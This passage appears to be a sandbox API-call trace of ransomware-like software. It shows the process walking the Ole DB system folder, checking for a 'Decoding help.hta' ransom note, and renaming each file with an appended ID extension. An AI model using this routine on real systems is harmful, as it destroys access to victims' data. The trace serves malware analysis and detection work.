lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" [0044.503] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" [0044.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.504] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabf604b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfabf604b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xdf9a48f0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0044.504] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.504] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32r.dll") returned -1 [0044.504] lstrlenW (lpString="oledb32r.dll") returned 12 [0044.504] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="oledb32r.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" [0044.504] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" [0044.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.504] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa4ffde2f, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0044.504] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.505] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledbjvs.inc") returned -1 [0044.505] lstrlenW (lpString="oledbjvs.inc") returned 12 [0044.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="oledbjvs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0044.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0044.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.505] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa52d1816, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0044.505] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.505] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledbvbs.inc") returned -1 [0044.505] lstrlenW (lpString="oledbvbs.inc") returned 12 [0044.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="oledbvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0044.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0044.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.506] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f0bf91, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92f0bf91, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92f320f1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x128000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0044.506] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.506] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.dll") returned -1 [0044.506] lstrlenW (lpString="sqloledb.dll") returned 12 [0044.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="sqloledb.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" [0044.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" [0044.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.506] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9350f, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xcc9350f, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xcc210f8, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0044.507] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.507] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqloledb.rll") returned -1 [0044.507] lstrlenW (lpString="sqloledb.rll") returned 12 [0044.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="sqloledb.rll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" [0044.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" [0044.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.546] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f7e4bf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x14f7e4bf, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x44773fc0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x59000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0044.546] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.546] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.546] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.dll") returned -1 [0044.546] lstrlenW (lpString="sqlxmlx.dll") returned 11 [0044.546] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.546] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="sqlxmlx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" [0044.546] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" [0044.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.546] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e5c85, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc9e5c85, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xc97386e, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0044.547] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.547] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqlxmlx.rll") returned -1 [0044.547] lstrlenW (lpString="sqlxmlx.rll") returned 11 [0044.547] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="sqlxmlx.rll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0044.547] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0044.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.547] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x44e18, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrw.dll", cAlternateFileName="")) returned 1 [0044.547] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.547] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.547] lstrcmpiW (lpString1="Decoding help.hta", lpString2="xmlrw.dll") returned -1 [0044.548] lstrlenW (lpString="xmlrw.dll") returned 9 [0044.548] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole 